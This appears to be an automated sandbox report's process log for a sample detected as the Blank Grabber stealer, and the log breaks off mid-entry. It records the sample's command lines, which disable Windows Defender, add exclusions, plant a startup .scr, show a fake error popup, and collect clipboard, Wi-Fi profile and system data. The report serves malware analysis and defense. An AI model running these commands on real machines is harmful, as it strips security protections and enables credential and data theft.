Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:37:55
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\sppawx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sppawx.exe"
Imagebase:	0x7ff79a310000
File size:	7'834'524 bytes
MD5 hash:	546606959CB5B178D679B203D938CF88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Imagebase:	0x7ff711e90000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7e2d20000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:38:02
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:38:02
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:38:02
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff6f3ac0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:38:02
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:38:02
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:38:03
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff6f3ac0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:38:03
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:38:03
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:38:03
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:38:05
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8016, Parent PID: 8040

General

Target ID:	29
Start time:	02:38:05
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:38:05
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:38:06
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:38:06
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:38:06
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 4068, Parent PID: 7860

General

Target ID:	36
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5648, Parent PID: 6680

General

Target ID:	37
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8044, Parent PID: 8104

General

Target ID:	42
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7e2d20000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7e2d20000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff7a81b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	02:38:09
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7e2d20000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:38:10
Start date:	13/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff750e60000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:38:10
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:38:10
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	02:38:10
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6a1c50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	02:38:11
Start date:	13/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff69a2b0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff772ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3904, Parent PID: 3592

General

Target ID:	60
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x910000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	02:38:12
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
